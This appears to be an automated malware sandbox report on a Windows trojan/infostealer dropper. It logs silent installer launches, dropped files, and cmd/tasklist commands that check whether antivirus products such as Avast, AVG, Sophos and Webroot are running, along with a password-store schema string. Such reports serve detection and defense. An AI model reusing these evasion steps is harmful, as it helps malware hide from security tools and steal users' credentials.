                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_0079ABD00_2_0079ABD0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B73800_2_007B7380
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007ACC000_2_007ACC00
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007CEC000_2_007CEC00
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007986700_2_00798670
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007A6ED10_2_007A6ED1
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_0079A7100_2_0079A710
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C67D00_2_007C67D0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_0079DF820_2_0079DF82
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007AE8700_2_007AE870
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007A88570_2_007A8857
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B28200_2_007B2820
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007CE8200_2_007CE820
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007938E00_2_007938E0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B70E00_2_007B70E0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B309E0_2_007B309E
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007A51520_2_007A5152
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007BE1450_2_007BE145
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B89380_2_007B8938
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B41200_2_007B4120
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007A9F860_2_007A9F86
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007959100_2_00795910
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007A790C0_2_007A790C
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007BC9810_2_007BC981
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007A59D00_2_007A59D0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C61C00_2_007C61C0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B81B90_2_007B81B9
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007AB9B00_2_007AB9B0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007BC1900_2_007BC190
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007CA2600_2_007CA260
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007BD2440_2_007BD244
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007962000_2_00796200
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B9AF00_2_007B9AF0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007AE2E00_2_007AE2E0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007A9ADE0_2_007A9ADE
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007BD2CF0_2_007BD2CF
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007942900_2_00794290
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007AD3600_2_007AD360
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007CC33D0_2_007CC33D
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007BD3330_2_007BD333
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C23000_2_007C2300
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007ADBF00_2_007ADBF0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B33EA0_2_007B33EA
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_00794BC00_2_00794BC0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007993C00_2_007993C0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007BDAAF0_2_007BDAAF
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B43B00_2_007B43B0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C4B940_2_007C4B94
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007CCC700_2_007CCC70
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007974600_2_00797460
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B24400_2_007B2440
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007A74090_2_007A7409
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C0CC00_2_007C0CC0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007CE4900_2_007CE490
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007A657A0_2_007A657A
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007A4D700_2_007A4D70
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007CCD600_2_007CCD60
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B45500_2_007B4550
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007A7D1A0_2_007A7D1A
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B950C0_2_007B950C
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007AE5F00_2_007AE5F0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B45F70_2_007B45F7
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007A1DE00_2_007A1DE0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B85920_2_007B8592
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C25800_2_007C2580
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B76700_2_007B7670
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_00795E600_2_00795E60
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B46360_2_007B4636
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B06F00_2_007B06F0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C76E00_2_007C76E0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_00792ED00_2_00792ED0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007ADED00_2_007ADED0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007CCEA00_2_007CCEA0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007966900_2_00796690
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B76900_2_007B7690
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C7F770_2_007C7F77
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C9F700_2_007C9F70
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C5F600_2_007C5F60
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007CCF500_2_007CCF50
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_00798FE00_2_00798FE0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007CCFE00_2_007CCFE0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B0FC00_2_007B0FC0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C57BC0_2_007C57BC
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007BD7910_2_007BD791
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007A9F860_2_007A9F86
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpCode function: 7_2_03AA1EE07_2_03AA1EE0
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpCode function: 7_2_03AA16B07_2_03AA16B0
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpCode function: 7_2_03AA11407_2_03AA1140
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp 8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_isdecmp.dll 31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: String function: 00797FA0 appears 41 times
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: String function: 007A4D60 appears 55 times
                  Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.4.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.exe.0.drStatic PE information: Number of sections : 11 > 10
                  Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.4.drStatic PE information: Number of sections : 11 > 10
                  Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.6.drStatic PE information: Number of sections : 11 > 10
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3926178432.00000000039AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3925720235.0000000003A92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3927226610.0000000003A98000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3937503296.00000000039AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3787196856.0000000002796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePastsocv3er.exe4 vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3926386851.00000000039A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3937182260.0000000003AA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3926797756.0000000003A9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3926046976.0000000003A93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3927780032.00000000039AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3936067995.0000000003BAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3937668851.0000000003AB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3980631709.0000000000B63000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePastsocv3er.exe4 vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3937004478.00000000039A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3926282396.0000000003A8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3925596656.00000000039AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3936337478.00000000039AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3934957368.0000000003AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3927112712.00000000039A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3936521892.0000000003AB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3933782488.0000000003AA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3934553892.00000000039B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3926589168.0000000003B81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3930159351.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3929008366.00000000039AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3926488590.0000000003A8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3925453238.0000000003A8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3937339896.0000000003BBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3937820173.0000000003BD3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3938216484.00000000039AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3929591877.0000000003AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3926904587.00000000039AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3933100072.00000000039A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3927339651.0000000003B8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3928316241.0000000003A9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3936700316.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3925309517.00000000039A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3931951681.0000000003AAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3925905901.00000000039AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3927008169.0000000003AA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3936842642.0000000003AA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3928482811.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3926694212.00000000039AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
                  Source: qnUFsmyxMm.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@56/10@2/2
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C6B50 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,0_2_007C6B50
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLibJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4416:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5512:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6376:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1972:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile created: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeJump to behavior
                  Source: qnUFsmyxMm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826704008.000000000336C000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809887326.0000000003388000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3810009358.000000000336B000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826704008.0000000003400000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: qnUFsmyxMm.exeVirustotal: Detection: 42%
                  Source: qnUFsmyxMm.exeReversingLabs: Detection: 34%
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile read: C:\Users\user\Desktop\qnUFsmyxMm.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\qnUFsmyxMm.exe "C:\Users\user\Desktop\qnUFsmyxMm.exe"
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeProcess created: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe "C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe"
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeProcess created: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp "C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$1044E,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe "C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENT
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp "C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$20474,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENT
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
                  Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
